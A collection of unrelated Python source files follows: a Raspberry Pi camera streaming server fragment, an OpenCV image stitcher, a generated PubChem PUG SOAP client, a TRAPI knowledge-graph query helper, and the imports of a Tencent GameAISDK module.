    def should_make_preview(self):
        """Determines whether preview should be taken and transferred to clients."""
        return self.frame_manager.is_started and self.clients > 0

    async def make_preview(self):
        """Capture a preview frame, cache it and broadcast it."""
        preview = self.frame_manager.preview()
        self.latest_preview = preview
        # Fix: restore the lost {filename} placeholder.
        self.logger.debug('Sending frame update for {filename} preview'.format(filename=preview.filename))
        await self.sio.emit('preview', preview.__dict__, namespace='/cam')

    async def stream_thumbs(self):
        """Send new image notification to client."""
        self.logger.debug('Starting thumbnail streaming background task.')
        while True:
            await self.sio.sleep(1 / self.frame_rate)

            if self.should_make_preview():
                await self.make_preview()

    async def auto_shoot_task(self):
        """Perform periodic shoots."""
        self.logger.debug('Starting auto shoot background task.')
        while True:
            if self.frame_manager.is_started and self.auto_shoot:
                await self.shoot()

            await self.sio.sleep(self.shoot_timeout)

    async def send_fps_updates(self):
        """Perform periodic fps updates."""
        self.logger.debug('Starting FPS update background task.')
        while True:
            await self.sio.sleep(1)

            if self.frame_manager.is_started:
                self.logger.debug('FPS: %s' % self.frame_manager.fps_counter.fps)
                await self.sio.emit('fps', {'fps': self.frame_manager.fps_counter.fps}, namespace='/cam')

    async def send_status_reports(self):
        """Sends periodic status reports to client."""
        self.logger.debug('Starting camera reporting background task.')
        while True:
            await self.send_status_report()
            await self.sio.sleep(self.report_timeout)

    async def postponed_camera_stop(self):
        """Stops the camera after a certain time."""
        self.logger.info('Entering postponed camera stop background task.')
        time_to_stop = self.camera_idle_timeout
        while self.frame_manager.is_started:
            self.logger.info('Camera will stop after {time_to_stop} seconds.'.format(time_to_stop=time_to_stop))
            if time_to_stop <= 0:
                self.frame_manager.stop()
                self.logger.info('Camera stopped after {timeout} timeout.'.format(
                    timeout=self.camera_idle_timeout
                ))
            time_to_stop -= 1
            await self.sio.sleep(1)

    async def startup_shooting(self):
        """Shoots certain time at the startup and then turn camera off."""
        if not self.shoot_at_startup:
            return

        # Leave room for the idle-timeout grace period at the end.
        shooting_timeout = max([self.startup_shooting_timeout - self.camera_idle_timeout, 0])
        self.logger.info('Info starting startup time lapse for {seconds} seconds.'.format(seconds=shooting_timeout))
        self.auto_shoot = True
        self.frame_manager.start()
        await self.sio.sleep(shooting_timeout)
        self.logger.info('Stopping startup time lapse...')
        self.auto_shoot = self.default_auto_shoot
        self.stop_camera()
def run(**kwargs):
    """Build an RPiCameraServer from the given options and serve it."""
    RPiCameraServer(**kwargs).run()


if __name__ == '__main__':
    run()
|
# Repository: 360ls/360ls-stitcher
"""
This module encapsulates the Stitcher class to enable stitching of images/frames.
"""
from __future__ import absolute_import, division, print_function
import numpy as np
import imutils
import cv2
class Stitcher(object):
    """Creates a single stitched frame from two frames.

    The homography between the two inputs is computed lazily on the
    first stitch and cached for subsequent frames; call :meth:`reset`
    to force recomputation (e.g. when the camera rig moves).
    """

    def __init__(self):
        """Initializes the homography cache and checks the OpenCV version."""
        self.isv3 = imutils.is_cv3()
        self.homography = None  # cached homography, or False if matching failed

    def stitch(self, frame1, frame2):
        """Return a composite of frame1 warped into frame2's plane.

        Computes (and caches) the homography on first use.  Returns
        None when not enough keypoint matches were found.
        """
        if self.homography is None:
            self.homography = compute_homography(frame1, frame2)
        # compute_homography returns False (not None) on failure, so a
        # failed attempt is remembered and not retried every frame.
        if self.homography is not False:
            return warp_images(frame2, frame1, self.homography)
        return None

    def show_stitch(self, frame1, frame2):
        """Stitch the two frames and display the result in a window."""
        result = self.stitch(frame1, frame2)
        if result is not None:
            cv2.imshow('Stitched output', result)
            cv2.waitKey()

    def reset(self):
        """Resets the homography of the stitcher to None for stitcher reuse."""
        self.homography = None

    def double_stitch(self, img1, img2, img3):  # pylint: disable=unused-argument, no-self-use
        """Stitch three frames together.  TODO: not implemented.

        Fix: raises NotImplementedError (the idiomatic exception for an
        unimplemented API) instead of a bare Exception; callers catching
        Exception still work.
        """
        raise NotImplementedError('Not implemented')
def compute_matches(frame1, frame2):
    """Return (matches, keypoints1, keypoints2) between the two frames.

    Extracts SURF keypoints/descriptors from each frame and matches
    them with a FLANN-based kNN matcher (k=2), ready for a subsequent
    Lowe ratio test.
    """
    # SURF feature extraction on both frames
    detector = cv2.xfeatures2d.SURF_create()
    keypoints1, descriptors1 = detector.detectAndCompute(frame1, None)
    keypoints2, descriptors2 = detector.detectAndCompute(frame2, None)

    # FLANN matcher: KD-tree index (algorithm id 0), 5 trees, 50 checks
    index_params = dict(algorithm=0, trees=5)
    search_params = dict(checks=50)
    matcher = cv2.FlannBasedMatcher(index_params, search_params)

    # Two nearest neighbours per descriptor
    matches = matcher.knnMatch(descriptors1, descriptors2, k=2)
    return matches, keypoints1, keypoints2
def compute_homography(frame1, frame2):
    """Estimate the homography mapping frame1's keypoints onto frame2's.

    Applies Lowe's ratio test to the kNN matches and, when at least 20
    good matches survive, fits a homography with RANSAC.  Returns the
    3x3 matrix, or False when there are too few reliable matches.
    """
    min_match_count = 20
    matches, keypoints1, keypoints2 = compute_matches(frame1, frame2)

    # Lowe's ratio test: keep matches clearly better than the runner-up.
    good_matches = [m for m, runner_up in matches
                    if m.distance < 0.7 * runner_up.distance]

    if len(good_matches) <= min_match_count:
        # Not enough correspondences for a trustworthy homography.
        return False

    src_pts = np.float32([keypoints1[m.queryIdx].pt
                          for m in good_matches]).reshape(-1, 1, 2)
    dst_pts = np.float32([keypoints2[m.trainIdx].pt
                          for m in good_matches]).reshape(-1, 1, 2)
    homography, _ = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)
    return homography
def warp_images(img1, img2, homography):
    """Warp img2 into img1's plane and composite img1 on top.

    Computes the joint bounding box of both images under the
    homography, translates everything into positive pixel coordinates,
    warps img2 onto that canvas, then pastes img1 at its (shifted)
    original location.
    """
    rows1, cols1 = img1.shape[:2]
    rows2, cols2 = img2.shape[:2]

    # Corner points of both images (img2's corners mapped through H)
    corners1 = np.float32([[0, 0], [0, rows1], [cols1, rows1], [cols1, 0]]).reshape(-1, 1, 2)
    corners2 = np.float32([[0, 0], [0, rows2], [cols2, rows2], [cols2, 0]]).reshape(-1, 1, 2)
    warped_corners2 = cv2.perspectiveTransform(corners2, homography)

    # Joint bounding box of both corner sets
    all_corners = np.concatenate((corners1, warped_corners2), axis=0)
    [x_min, y_min] = np.int32(all_corners.min(axis=0).ravel() - 0.5)
    [x_max, y_max] = np.int32(all_corners.max(axis=0).ravel() + 0.5)

    # Translation shifting the whole box into positive coordinates
    translation_dist = [-x_min, -y_min]
    homography_translation = np.array([[1, 0, translation_dist[0]],
                                       [0, 1, translation_dist[1]],
                                       [0, 0, 1]])

    output_img = cv2.warpPerspective(img2, homography_translation.dot(homography),  # pylint: disable=no-member
                                     (x_max - x_min, y_max - y_min))
    # Overlay img1 at its shifted location on the combined canvas
    output_img[translation_dist[1]:rows1 + translation_dist[1],
               translation_dist[0]:cols1 + translation_dist[0]] = img1
    return output_img
|
##################################################
# PUG_services.py
# generated by ZSI.generate.wsdl2python
##################################################
from PUG_services_types import *
import urlparse, types
from ZSI.TCcompound import ComplexType, Struct
from ZSI import client
import ZSI
from ZSI.generate.pyclass import pyclass_type
# Locator
class PUGLocator:
    """Locates the PubChem PUG SOAP service and builds client proxies."""

    # Default service endpoint (from the WSDL this module was generated from).
    PUGSoap_address = "http://127.0.0.1:9000/pug_soap/pug_soap.cgi"

    def getPUGSoapAddress(self):
        """Return the default PUGSoap endpoint URL."""
        return PUGLocator.PUGSoap_address

    def getPUGSoap(self, url=None, **kw):
        """Build a PUGSoapSOAP proxy bound to *url* (default: class endpoint)."""
        endpoint = url or PUGLocator.PUGSoap_address
        return PUGSoapSOAP(endpoint, **kw)
# Methods
class PUGSoapSOAP:
    """SOAP client proxy for the PubChem Power User Gateway (PUG) service.

    Originally generated by ZSI's wsdl2python.  Each public method performs
    one SOAP operation through a ZSI ``client.Binding``: it validates the
    request object's type, sends it with the operation's SOAPAction, and
    returns the decoded response.  The ``*SoapIn`` / ``*SoapOut`` message
    classes are the module-level pyclass declarations defined after this
    class.

    Fixes over the generated code: the Python-2-only ``raise TypeError, msg``
    statement syntax is replaced with the call form (valid on both Python 2
    and 3), and the 30 identical method bodies are routed through one private
    helper.  All public method names and signatures are unchanged.
    """

    def __init__(self, url, **kw):
        """Create a ZSI binding to the service at *url*; extra kw go to ZSI."""
        kw.setdefault("readerclass", None)
        kw.setdefault("writerclass", None)
        # no resource properties
        self.binding = client.Binding(url=url, **kw)
        # no ws-addressing

    def _call(self, request, request_class, response_class, soapaction):
        """Validate *request*, send it with *soapaction*, return the decoded
        response.  Raises TypeError if *request* is not a *request_class*."""
        if not isinstance(request, request_class):
            raise TypeError("%s incorrect request type" % (request.__class__))
        # no input or output wsaction for any PUG operation
        self.binding.Send(None, None, request, soapaction=soapaction)
        return self.binding.Receive(response_class.typecode)

    # op: AssayDownload
    def AssayDownload(self, request):
        return self._call(request, AssayDownloadSoapIn, AssayDownloadSoapOut,
                          "http://127.0.0.1:9000/AssayDownload")

    # op: Download
    def Download(self, request):
        return self._call(request, DownloadSoapIn, DownloadSoapOut,
                          "http://127.0.0.1:9000/Download")

    # op: GetAssayColumnDescription
    def GetAssayColumnDescription(self, request):
        return self._call(request, GetAssayColumnDescriptionSoapIn, GetAssayColumnDescriptionSoapOut,
                          "http://127.0.0.1:9000/GetAssayColumnDescription")

    # op: GetAssayColumnDescriptions
    def GetAssayColumnDescriptions(self, request):
        return self._call(request, GetAssayColumnDescriptionsSoapIn, GetAssayColumnDescriptionsSoapOut,
                          "http://127.0.0.1:9000/GetAssayColumnDescriptions")

    # op: GetAssayDescription
    def GetAssayDescription(self, request):
        return self._call(request, GetAssayDescriptionSoapIn, GetAssayDescriptionSoapOut,
                          "http://127.0.0.1:9000/GetAssayDescription")

    # op: GetDownloadUrl
    def GetDownloadUrl(self, request):
        return self._call(request, GetDownloadUrlSoapIn, GetDownloadUrlSoapOut,
                          "http://127.0.0.1:9000/GetDownloadUrl")

    # op: GetEntrezKey
    def GetEntrezKey(self, request):
        return self._call(request, GetEntrezKeySoapIn, GetEntrezKeySoapOut,
                          "http://127.0.0.1:9000/GetEntrezKey")

    # op: GetEntrezUrl
    def GetEntrezUrl(self, request):
        return self._call(request, GetEntrezUrlSoapIn, GetEntrezUrlSoapOut,
                          "http://127.0.0.1:9000/GetEntrezUrl")

    # op: GetIDList
    def GetIDList(self, request):
        return self._call(request, GetIDListSoapIn, GetIDListSoapOut,
                          "http://127.0.0.1:9000/GetIDList")

    # op: GetListItemsCount
    def GetListItemsCount(self, request):
        return self._call(request, GetListItemsCountSoapIn, GetListItemsCountSoapOut,
                          "http://127.0.0.1:9000/GetListItemsCount")

    # op: GetOperationStatus
    def GetOperationStatus(self, request):
        return self._call(request, GetOperationStatusSoapIn, GetOperationStatusSoapOut,
                          "http://127.0.0.1:9000/GetOperationStatus")

    # op: GetStandardizedCID
    def GetStandardizedCID(self, request):
        return self._call(request, GetStandardizedCIDSoapIn, GetStandardizedCIDSoapOut,
                          "http://127.0.0.1:9000/GetStandardizedCID")

    # op: GetStandardizedStructure
    def GetStandardizedStructure(self, request):
        return self._call(request, GetStandardizedStructureSoapIn, GetStandardizedStructureSoapOut,
                          "http://127.0.0.1:9000/GetStandardizedStructure")

    # op: GetStandardizedStructureBase64
    def GetStandardizedStructureBase64(self, request):
        return self._call(request, GetStandardizedStructureBase64SoapIn, GetStandardizedStructureBase64SoapOut,
                          "http://127.0.0.1:9000/GetStandardizedStructureBase64")

    # op: GetStatusMessage
    def GetStatusMessage(self, request):
        return self._call(request, GetStatusMessageSoapIn, GetStatusMessageSoapOut,
                          "http://127.0.0.1:9000/GetStatusMessage")

    # op: IdentitySearch
    def IdentitySearch(self, request):
        return self._call(request, IdentitySearchSoapIn, IdentitySearchSoapOut,
                          "http://127.0.0.1:9000/IdentitySearch")

    # op: IDExchange
    def IDExchange(self, request):
        return self._call(request, IDExchangeSoapIn, IDExchangeSoapOut,
                          "http://127.0.0.1:9000/IDExchange")

    # op: InputAssay
    def InputAssay(self, request):
        return self._call(request, InputAssaySoapIn, InputAssaySoapOut,
                          "http://127.0.0.1:9000/InputAssay")

    # op: InputEntrez
    def InputEntrez(self, request):
        return self._call(request, InputEntrezSoapIn, InputEntrezSoapOut,
                          "http://127.0.0.1:9000/InputEntrez")

    # op: InputList
    def InputList(self, request):
        return self._call(request, InputListSoapIn, InputListSoapOut,
                          "http://127.0.0.1:9000/InputList")

    # op: InputListString
    def InputListString(self, request):
        return self._call(request, InputListStringSoapIn, InputListStringSoapOut,
                          "http://127.0.0.1:9000/InputListString")

    # op: InputListText
    def InputListText(self, request):
        return self._call(request, InputListTextSoapIn, InputListTextSoapOut,
                          "http://127.0.0.1:9000/InputListText")

    # op: InputStructure
    def InputStructure(self, request):
        return self._call(request, InputStructureSoapIn, InputStructureSoapOut,
                          "http://127.0.0.1:9000/InputStructure")

    # op: InputStructureBase64
    def InputStructureBase64(self, request):
        return self._call(request, InputStructureBase64SoapIn, InputStructureBase64SoapOut,
                          "http://127.0.0.1:9000/InputStructureBase64")

    # op: MFSearch
    def MFSearch(self, request):
        return self._call(request, MFSearchSoapIn, MFSearchSoapOut,
                          "http://127.0.0.1:9000/MFSearch")

    # op: ScoreMatrix
    def ScoreMatrix(self, request):
        return self._call(request, ScoreMatrixSoapIn, ScoreMatrixSoapOut,
                          "http://127.0.0.1:9000/ScoreMatrix")

    # op: SimilaritySearch2D
    def SimilaritySearch2D(self, request):
        return self._call(request, SimilaritySearch2DSoapIn, SimilaritySearch2DSoapOut,
                          "http://127.0.0.1:9000/SimilaritySearch2D")

    # op: Standardize
    def Standardize(self, request):
        return self._call(request, StandardizeSoapIn, StandardizeSoapOut,
                          "http://127.0.0.1:9000/Standardize")

    # op: SubstructureSearch
    def SubstructureSearch(self, request):
        return self._call(request, SubstructureSearchSoapIn, SubstructureSearchSoapOut,
                          "http://127.0.0.1:9000/SubstructureSearch")

    # op: SuperstructureSearch
    def SuperstructureSearch(self, request):
        return self._call(request, SuperstructureSearchSoapIn, SuperstructureSearchSoapOut,
                          "http://127.0.0.1:9000/SuperstructureSearch")
# Module-level request/response message classes, one pair per PUG SOAP
# operation: "*SoapIn" is the input message pyclass and "*SoapOut" the
# matching response pyclass.  "ns0" comes from the star import of
# PUG_services_types above; these declarations are generated from the WSDL.
AssayDownloadSoapIn = ns0.AssayDownload_Dec().pyclass
AssayDownloadSoapOut = ns0.AssayDownloadResponse_Dec().pyclass
DownloadSoapIn = ns0.Download_Dec().pyclass
DownloadSoapOut = ns0.DownloadResponse_Dec().pyclass
GetAssayColumnDescriptionSoapIn = ns0.GetAssayColumnDescription_Dec().pyclass
GetAssayColumnDescriptionSoapOut = ns0.GetAssayColumnDescriptionResponse_Dec().pyclass
GetAssayColumnDescriptionsSoapIn = ns0.GetAssayColumnDescriptions_Dec().pyclass
GetAssayColumnDescriptionsSoapOut = ns0.GetAssayColumnDescriptionsResponse_Dec().pyclass
GetAssayDescriptionSoapIn = ns0.GetAssayDescription_Dec().pyclass
GetAssayDescriptionSoapOut = ns0.GetAssayDescriptionResponse_Dec().pyclass
GetDownloadUrlSoapIn = ns0.GetDownloadUrl_Dec().pyclass
GetDownloadUrlSoapOut = ns0.GetDownloadUrlResponse_Dec().pyclass
GetEntrezKeySoapIn = ns0.GetEntrezKey_Dec().pyclass
GetEntrezKeySoapOut = ns0.GetEntrezKeyResponse_Dec().pyclass
GetEntrezUrlSoapIn = ns0.GetEntrezUrl_Dec().pyclass
GetEntrezUrlSoapOut = ns0.GetEntrezUrlResponse_Dec().pyclass
GetIDListSoapIn = ns0.GetIDList_Dec().pyclass
GetIDListSoapOut = ns0.GetIDListResponse_Dec().pyclass
GetListItemsCountSoapIn = ns0.GetListItemsCount_Dec().pyclass
GetListItemsCountSoapOut = ns0.GetListItemsCountResponse_Dec().pyclass
GetOperationStatusSoapIn = ns0.GetOperationStatus_Dec().pyclass
GetOperationStatusSoapOut = ns0.GetOperationStatusResponse_Dec().pyclass
GetStandardizedCIDSoapIn = ns0.GetStandardizedCID_Dec().pyclass
GetStandardizedCIDSoapOut = ns0.GetStandardizedCIDResponse_Dec().pyclass
GetStandardizedStructureSoapIn = ns0.GetStandardizedStructure_Dec().pyclass
GetStandardizedStructureSoapOut = ns0.GetStandardizedStructureResponse_Dec().pyclass
GetStandardizedStructureBase64SoapIn = ns0.GetStandardizedStructureBase64_Dec().pyclass
GetStandardizedStructureBase64SoapOut = ns0.GetStandardizedStructureBase64Response_Dec().pyclass
GetStatusMessageSoapIn = ns0.GetStatusMessage_Dec().pyclass
GetStatusMessageSoapOut = ns0.GetStatusMessageResponse_Dec().pyclass
IdentitySearchSoapIn = ns0.IdentitySearch_Dec().pyclass
IdentitySearchSoapOut = ns0.IdentitySearchResponse_Dec().pyclass
IDExchangeSoapIn = ns0.IDExchange_Dec().pyclass
IDExchangeSoapOut = ns0.IDExchangeResponse_Dec().pyclass
InputAssaySoapIn = ns0.InputAssay_Dec().pyclass
InputAssaySoapOut = ns0.InputAssayResponse_Dec().pyclass
InputEntrezSoapIn = ns0.InputEntrez_Dec().pyclass
InputEntrezSoapOut = ns0.InputEntrezResponse_Dec().pyclass
InputListSoapIn = ns0.InputList_Dec().pyclass
InputListSoapOut = ns0.InputListResponse_Dec().pyclass
InputListStringSoapIn = ns0.InputListString_Dec().pyclass
InputListStringSoapOut = ns0.InputListStringResponse_Dec().pyclass
InputListTextSoapIn = ns0.InputListText_Dec().pyclass
InputListTextSoapOut = ns0.InputListTextResponse_Dec().pyclass
InputStructureSoapIn = ns0.InputStructure_Dec().pyclass
InputStructureSoapOut = ns0.InputStructureResponse_Dec().pyclass
InputStructureBase64SoapIn = ns0.InputStructureBase64_Dec().pyclass
InputStructureBase64SoapOut = ns0.InputStructureBase64Response_Dec().pyclass
MFSearchSoapIn = ns0.MFSearch_Dec().pyclass
MFSearchSoapOut = ns0.MFSearchResponse_Dec().pyclass
ScoreMatrixSoapIn = ns0.ScoreMatrix_Dec().pyclass
ScoreMatrixSoapOut = ns0.ScoreMatrixResponse_Dec().pyclass
SimilaritySearch2DSoapIn = ns0.SimilaritySearch2D_Dec().pyclass
SimilaritySearch2DSoapOut = ns0.SimilaritySearch2DResponse_Dec().pyclass
StandardizeSoapIn = ns0.Standardize_Dec().pyclass
StandardizeSoapOut = ns0.StandardizeResponse_Dec().pyclass
SubstructureSearchSoapIn = ns0.SubstructureSearch_Dec().pyclass
SubstructureSearchSoapOut = ns0.SubstructureSearchResponse_Dec().pyclass
SuperstructureSearchSoapIn = ns0.SuperstructureSearch_Dec().pyclass
SuperstructureSearchSoapOut = ns0.SuperstructureSearchResponse_Dec().pyclass
|
import json
from dug.utils import biolink_snake_case
# Fix: derive from Exception, not BaseException, so generic
# "except Exception" handlers can catch it (PEP 8 guidance).
class MissingNodeReferenceError(Exception):
    """Raised when an answer references a node id absent from the parent knowledge graph."""
    pass
# Fix: derive from Exception, not BaseException, so generic
# "except Exception" handlers can catch it (PEP 8 guidance).
class MissingEdgeReferenceError(Exception):
    """Raised when an answer references an edge id absent from the parent knowledge graph."""
    pass
class QueryKG:
    """Convenience wrapper around a TRAPI 1.0 knowledge-graph message.

    Exposes the message's answers, query graph, and knowledge-graph nodes and
    edges, flattens TRAPI attribute lists into plain dicts, and converts the
    TRAPI 1.0 layout into the older knowledge_map/knowledge_graph layout used
    by the UI (see get_kg).

    Fixes over the original: mutable default arguments replaced with None,
    _parse_attributes defaults to a list (matching the TRAPI schema), and the
    "subraph" typo in error messages corrected.
    """

    def __init__(self, kg_json):
        """Wrap a TRAPI response dict of the form ``{"message": {...}}``."""
        self.kg = kg_json["message"]
        self.answers = self.kg.get("results", [])
        self.question = self.kg.get("query_graph", {})
        # TRAPI 1.0 keys nodes/edges by id: {kg_id: {...node/edge info...}}
        self.nodes = self.kg.get("knowledge_graph", {}).get("nodes")
        self.edges = self.kg.get("knowledge_graph", {}).get("edges")

    def get_answer_subgraph(self, answer, include_node_keys=None, include_edge_keys=None):
        """Return a new QueryKG containing only the nodes/edges bound by *answer*.

        :param answer: one entry of the message's ``results`` list
        :param include_node_keys: optional list of keys to keep on each node
        :param include_edge_keys: optional list of keys to keep on each edge
        :raises MissingNodeReferenceError: answer references an unknown node id
        :raises MissingEdgeReferenceError: answer references an unknown edge id
        """
        # Collect node info for every node bound by the answer
        answer_nodes = {}
        for binding_nodes in answer["node_bindings"].values():
            for answer_node in binding_nodes:
                # Node must actually exist in the parent knowledge graph
                if answer_node["id"] not in self.nodes:
                    err_msg = f"Unable to assemble subgraph for answer:\n{json.dumps(answer, indent=2)}\n" \
                              f"Parent graph doesn't contain node info for: {answer_node}"
                    raise MissingNodeReferenceError(err_msg)
                # Add only node info that you actually want
                answer_nodes[answer_node["id"]] = self.get_node(answer_node["id"], include_node_keys)
        # Collect edge info for every edge bound by the answer
        answer_edges = {}
        for binding_edges in answer["edge_bindings"].values():
            for answer_edge in binding_edges:
                # Edge must actually exist in the parent knowledge graph
                if answer_edge["id"] not in self.edges:
                    err_msg = f"Unable to assemble subgraph for answer:\n{json.dumps(answer, indent=2)}\n" \
                              f"Parent graph doesn't contain edge info for: {answer_edge}"
                    raise MissingEdgeReferenceError(err_msg)
                # Add only information from edge that you actually want
                answer_edges[answer_edge["id"]] = self.get_edge(answer_edge["id"], include_edge_keys)
        kg = {"message": {
            "knowledge_graph": {
                "nodes": answer_nodes,
                "edges": answer_edges
            },
            "results": [answer],
            "query_graph": self.question
        }}
        return QueryKG(kg)

    def _parse_attributes(self, kg_component):
        """Flatten a TRAPI 1.0 ``attributes`` list into a plain dict.

        TRAPI 1.0 components look like
        {"id": ..., "name": ..., "attributes": [{"name": ..., "value": ...}, ...]}.

        :param kg_component: dict representing a node or an edge
        :return: {attribute name: attribute value}
        """
        return {attr["name"]: attr["value"] for attr in kg_component.get("attributes", [])}

    def get_node(self, node_id, include_node_keys=None):
        """Return the node for *node_id* with its attributes flattened in,
        optionally subset to *include_node_keys*."""
        node = self._parse_attributes(self.nodes[node_id])
        # Merge in the top-level node fields (everything except the raw attributes)
        node.update({k: v for k, v in self.nodes[node_id].items() if k != "attributes"})
        node["id"] = node_id
        node["name"] = self.nodes[node_id].get("name", "")
        # Optionally subset to get only certain information columns
        if include_node_keys:
            node = {key: node.get(key) for key in include_node_keys}
        return node

    def get_edge(self, edge_id, include_edge_keys=None):
        """Return the edge for *edge_id* with its attributes flattened in and
        publications normalized to a list, optionally subset to *include_edge_keys*."""
        edge = self._parse_attributes(self.edges[edge_id])
        edge.update({k: v for k, v in self.edges[edge_id].items() if k != "attributes"})
        edge["id"] = edge_id
        # publications may arrive as a single string; always expose a list
        edge["publications"] = edge.get("publications", [])
        if isinstance(edge["publications"], str):
            edge["publications"] = [edge["publications"]]
        # Optionally subset to include only certain info
        if include_edge_keys:
            edge = {key: edge.get(key) for key in include_edge_keys}
        return edge

    def get_nodes(self):
        """Return every knowledge-graph node (attributes flattened)."""
        nodes_dict = self.kg.get("knowledge_graph", {}).get("nodes", {})
        return [self.get_node(curie) for curie in nodes_dict]

    def get_edges(self):
        """Return every knowledge-graph edge (attributes flattened)."""
        edges_dict = self.kg.get("knowledge_graph", {}).get("edges", {})
        return [self.get_edge(kg_id) for kg_id in edges_dict]

    def get_node_names(self, include_curie=True):
        """Return node names; skip the query's pinned curie nodes unless *include_curie*."""
        node_names = []
        curie_ids = self.get_curie_ids()
        for node in self.get_nodes():
            if include_curie or node['id'] not in curie_ids:
                node_names.append(node['name'])
        return node_names

    def get_node_synonyms(self, include_curie=True):
        """Return all node synonyms; skip pinned curie nodes unless *include_curie*."""
        node_synonyms = []
        curie_ids = self.get_curie_ids()
        for node in self.get_nodes():
            if include_curie or node['id'] not in curie_ids:
                node_synonyms += node.get('synonyms') or []
        return node_synonyms

    def get_curie_ids(self):
        """Return the curies pinned in the query graph's nodes."""
        question_nodes_dict = self.question.get('nodes', {})
        return [question_nodes_dict[node]['id'] for node in question_nodes_dict if 'id' in question_nodes_dict[node]]

    def get_kg(self):
        """Convert the TRAPI 1.0 message into the old-style KG layout
        (knowledge_map / knowledge_graph / question_graph) used by the UI."""
        # TODO: Make this parse out old-style json so ui doesn't break
        old_kg_model = {
            "knowledge_map": [],
            "knowledge_graph": {
                "nodes": [],
                "edges": [],
            },
            "question_graph": {
                "nodes": [],
                "edges": []
            }
        }
        # Question-graph nodes: strip the biolink prefix and snake_case the categories
        query_graph = self.kg.get("query_graph")
        for q_id, node_details in query_graph["nodes"].items():
            node_curie = node_details.get("id", "")
            node_type = [self._snake_case(x.replace('biolink:', '')) for x in node_details.get("category", [])]
            old_node = {"id": q_id, "type": node_type}
            if node_curie:
                old_node.update({"curie": node_curie})
            old_kg_model["question_graph"]["nodes"].append(old_node)
        # Question-graph edges: subject/object become source_id/target_id
        for q_id, edge_details in query_graph["edges"].items():
            old_edge = {"id": q_id, "source_id": edge_details["subject"], "target_id": edge_details["object"]}
            edge_type = edge_details.get("predicate")
            if edge_type:
                old_edge.update({"type": edge_type})
            old_kg_model["question_graph"]["edges"].append(old_edge)
        # Bindings: each answer maps query ids to the bound knowledge-graph ids
        for bindings in self.kg.get("results"):
            old_binding = {}
            for binding_type, bound in bindings.items():
                for q_id, kg_entries in bound.items():
                    old_binding.setdefault(binding_type, {})[q_id] = [x["id"] for x in kg_entries]
            old_kg_model["knowledge_map"].append(old_binding)
        old_kg_model["knowledge_graph"]["nodes"] = self.get_nodes()
        for node in old_kg_model["knowledge_graph"]["nodes"]:
            # fall back to the id when a node has no name
            node["name"] = node["name"] if node["name"] else node["id"]
        old_kg_model["knowledge_graph"]["edges"] = self.get_edges()
        for edge in old_kg_model["knowledge_graph"]["edges"]:
            # old layout expects type/source_id/target_id on each edge
            edge["type"] = edge["predicate"]
            # source_id and target_id should always be str
            edge["source_id"] = edge["subject"]
            edge["target_id"] = edge["object"]
        return old_kg_model

    def _snake_case(self, arg: str):
        """Delegate biolink snake_casing to dug.utils."""
        return biolink_snake_case(arg)
# Fix: derive from Exception, not BaseException, so generic
# "except Exception" handlers can catch it (PEP 8 guidance).
class InvalidQueryError(Exception):
    """Raised when a query graph contains invalid types or an out-of-range curie index."""
    pass
class QueryFactory:
    """Builds select queries linking a chain of biolink types, anchored on a
    curie at one position (curie_index) in the chain."""

    # Class member list of valid data types that can be included in query
    data_types = ["publication", "phenotypic_feature", "gene", "disease", "chemical_substance",
                  "drug_exposure", "biological_process", "anatomical_entity", "small_molecule",
                  "chemical_mixture", "chemical_entity"]

    # List of curie prefixes that are valid for certain curie types
    curie_map = {"disease": ["MONDO", "ORPHANET", "DOID"],
                 "phenotypic_feature": ["HP", "HPO", "EFO"],
                 "gene": ["HGNC", "NCBIGene"],
                 "chemical_substance": ["CHEBI", "PUBCHEM.COMPOUND", "CHEMBL.COMPOUND"],
                 "chemical_mixture": ["CHEBI", "PUBCHEM.COMPOUND", "CHEMBL.COMPOUND"],
                 "chemical_entity": ["CHEBI", "PUBCHEM.COMPOUND", "CHEMBL.COMPOUND"],
                 "small_molecule": ["CHEBI", "PUBCHEM.COMPOUND", "CHEMBL.COMPOUND"],
                 "anatomical_entity": ["UBERON"]}

    def __init__(self, question_graph, source, curie_index=0):
        """Create a factory for queries over *question_graph*.

        :param question_graph: ordered list of type names to connect
        :param source: query source (e.g. /schema or /graph/gamma/quick)
        :param curie_index: position in the chain matched against curies
        :raises InvalidQueryError: index out of range or unknown type present
        """
        # List of terms that are going to be connected to make a query
        self.question_graph = question_graph
        # Index in question graph that will be matched against curies
        self.curie_index = curie_index
        # Query source (e.g. /schema or /graph/gamma/quick)
        self.source = source
        # Check to make sure curie index isn't out of range
        if self.curie_index >= len(self.question_graph):
            raise InvalidQueryError(f"Invalid query index ({curie_index})! Question graph only "
                                    f"contains {len(self.question_graph)} entries!")
        # Set the type of the curie for downstream curie checking
        self.curie_type = self.question_graph[self.curie_index]
        # Validate that all entries in question graph are actually valid types
        self.validate_factory()

    def validate_factory(self):
        """Raise InvalidQueryError if any entry isn't a known data type."""
        for question in self.question_graph:
            # fix: "not question in" -> idiomatic "not in"
            if question not in QueryFactory.data_types:
                raise InvalidQueryError(f"Query contains invalid query type: {question}")

    def is_valid_curie(self, curie):
        """Return True when *curie*'s prefix is acceptable for the anchor type."""
        # Curie types absent from curie_map accept any prefix
        if self.curie_type not in QueryFactory.curie_map:
            return True
        # Otherwise the curie must start with one of the acceptable prefixes
        return any(curie.startswith(prefix)
                   for prefix in QueryFactory.curie_map[self.curie_type])

    def get_query(self, curie):
        """Build the select query anchored on *curie*.

        Returns None if the curie prefix isn't valid for the anchor type.
        Duplicate types in the chain receive unique aliases (gen0:gene, ...).
        """
        if not self.is_valid_curie(curie):
            return None
        question = []
        seen = []
        curie_id = ""
        for i, query_type in enumerate(self.question_graph):
            if self.question_graph.count(query_type) > 1:
                # Duplicate type: alias = first 3 chars + occurrence count so far
                alias = f"{query_type[0:3]}{len([x for x in seen if x == query_type])}"
                query = f"{alias}:{query_type}"
            else:
                alias = query_type
                query = query_type
            # The anchor position contributes the where-clause identifier
            if i == self.curie_index:
                curie_id = alias
            # Append to list of query_types currently in query
            seen.append(query_type)
            # Append to list of actual terms that will appear in query
            question.append(query)
        return f"select {'->'.join(question)} from '{self.source}' where {curie_id}='{curie}'"
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making GameAISDK available.
This source code file is licensed under the GNU General Public License Version 3.
For full details, please refer to the file "LICENSE.txt" which is provided as part of this source code package.
Copyright (C) 2020 THL A29 Limited, a Tencent company. All rights reserved.
"""
import logging
from math import sqrt
import math
import cv2
from PyQt5.QtGui import QColor, QImage, QPixmap, QPen, QPainterPath
from PyQt5.QtCore import Qt
import networkx as nx
